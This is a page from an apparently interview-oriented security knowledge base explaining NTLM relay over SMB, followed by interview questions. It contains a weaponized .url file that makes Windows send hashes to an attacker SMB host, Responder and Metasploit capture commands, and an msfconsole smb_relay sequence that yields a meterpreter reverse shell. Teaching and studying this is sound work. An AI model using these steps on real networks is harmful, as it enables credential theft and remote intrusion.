Interview Bank
  • Interview Bank
  • Web
    • Persistent Connection and Non Persistent
    • CDN
    • Code Review
    • JWT
      • JWT vs Session Based Authentication
      • JWT Challenge
      • JWE
      • JWS
    • Content Security Policy (CSP)
    • Same-origin Policy (SOP)
    • Cross-Origin Resource Sharing (CORS)
      • Exploiting CORS
    • HTTP Strict Transport Security (HSTS)
    • SQL Injection (SQLi)
    • Password Encryption in Login APIs
    • API Security
      • API Principles
    • Simple bypass PHP
    • Server-side Template Injection (SSTI)
    • Javascript Object and Inheritance
    • HTTP/2
    • Cookie vs Local vs session Storage
    • XML External Entity (XXE)
    • What happened when enter domain name in browser
    • Prototype Pollution - Part 1
    • Prototype Pollution - Part 2
    • Nginx vs Apache
  • OT Security
    • Securing Operational Technology: Understanding OT Security
  • Quantum Computing
    • Quantum Computing: Unveiling the Cryptographic Paradigm Shift
    • Quantum Obfuscation: Shielding Code in the Quantum Era
  • DevSecOps
    • Continuous Integration/Continuous Deployment Pipeline Security
    • Chaos Engineering Overview
      • Security Chaos Engineering
    • Mysql VS redis
    • Kubernetes (k8s)
    • How MySQL executes query
    • REDIS
    • Difference between cache and buffer
  • Windows
    • Pentesting Active Directory - Active Directory 101
    • Pentesting Active Directory - Kerberos (Part 1)
    • Pentesting Active Directory - Kerberos (Part 2)
    • AD vs Kerberos vs LDAP
    • Active Directory Certificate Services Part 1
    • Unconstrained Delegation
    • AS-REP Roasting
    • NTLM Relay via SMB
    • LLMRN
    • Windows lateral movement
    • Constrained Delegation
    • Resource-Based Constrained Delegation
    • IFEO (lmage File Execution Options) Hijacking
  • UNIX
    • Setuid
  • Large Language Models (LLMs)
    • Tokens
    • LangChain
    • Integration and Security
  • Android
    • Keystore
  • Red team development
    • Secure C2 Infrastructure
    • P Invoke in c#
    • D Invoke
    • ExitProcess vs ExitThread
  • Blue Team
    • Indicators of Compromise
    • Methods to prevent Email domain spoofing
    • Windows Prefetching
  • CVE
    • XZ Outbreak CVE-2024-3094
    • Log4J Vulnerability (CVE-2021-44228)
    • SolarWinds Hack (CVE-2020-10148)
    • PHP CGI RCE (CVE-2024-4577)
    • Windows Recall
  • Software Architecture
    • Microservices
    • KVM
  • Docker
    • Overview
    • Daemon Socket
    • Tips to reduce docker size
  • Blockchain
    • Overview
    • Smart Contract
  • Business Acumen
    • Market Research Reports and Perception
    • Understanding Acquisitions
    • Cybersecurity as a Business Strategy
  • Cyber Teams
    • Introduction to Purple Teaming
  • Malware
    • Dynamic Sandbox Limitations
Powered by GitBook
On this page
  • Execution via .URL
  • Why does it auto authenticates?
  • More relays
  • Author
  • Interview Question
  1. Windows

NTLM Relay via SMB

PreviousAS-REP RoastingNextLLMRN

Last updated 9 months ago

SMB is a protocol which is widely used across organisations for file sharing purposes. It is not uncommon during internal penetration tests to discover a file share which contains sensitive information such as plain-text passwords and database connection strings.

However even if a file share doesn’t contain any data that could be used to connect to other systems but it is configured with write permissions for unauthenticated users then it is possible to obtain passwords hashes of domain users or Meterpreter shells.

Let's walk through the example of using url links

Execution via .URL

Create a weaponized .url file and upload it to the victim system:

[InternetShortcut]
URL=whatever
WorkingDirectory=whatever
IconFile=\\192.168.0.37\%USERNAME%.icon
IconIndex=1

Create a listener on the attacking system:

responder -I eth1 -v

There are alternative way to Responder, Metasploit Framrwork has a module can be used to capture challenge-response password hashs from SMB Clients

auxiliary/server/capture/smb

Once the victim access the fileshare, the OS tries to authenticate to the attacker's malicious SMB listener on 192.168.0.37. NTLMv2-SSP hash will be sent and capture.

Next we can proceed to crack this NTLMv2-SSP hash using john

Why does it auto authenticates?

When parsing a shortcut, Windows reads the contents to determine the properties of the shortcut, including where the linked resource is what and what icon should represent it.

If the .URL files specifies an icon file located on a network resource (Above example), Windows will attempt to access the network location to retrieve the icon. This is where the automatic behaviour comes into play:

  • Network Request: Windows makes a network request to the specified server (attacker smb server).

  • Authentication: Since its a network resources, Windows will try to authenticate to the server using available credentials. This is typically handled using NTLM authentication if kerberos is not configured.

  • Once the icon is retrieved, it is displayed in the shortcut's place in the file explorer.

More relays

Let's assume we have 2 machines, victim1 user is able authentication to victim2 machine.

We can relay the victim1 hash to victim2 and return a meterpreter shell.

Firstly launch msfconsole

use exploit/windows/smb/smb_relay
set payload windows/x64/meterpreter/reverse_tcp
set relay_targets 192.168.0.50 --victim2
set smbdomain cyberrange.com
set smbshare public --victim2 writable share
exploit

after victim1 open up the malicious url shares, it will use the hash

Author

Ik0nw

Interview Question

1) Other than abusing the .URL, any other methods that enable force authentication to smb

2) What are the ways to defend smb relay attacks

3) Explain why do the victim able to automatically access the attacker's smb share just by opening the share?

4) How do defend such attacks

5) Do smbrelay able to relay the hash back to the victim itself?

Responder
Metasploit smb capture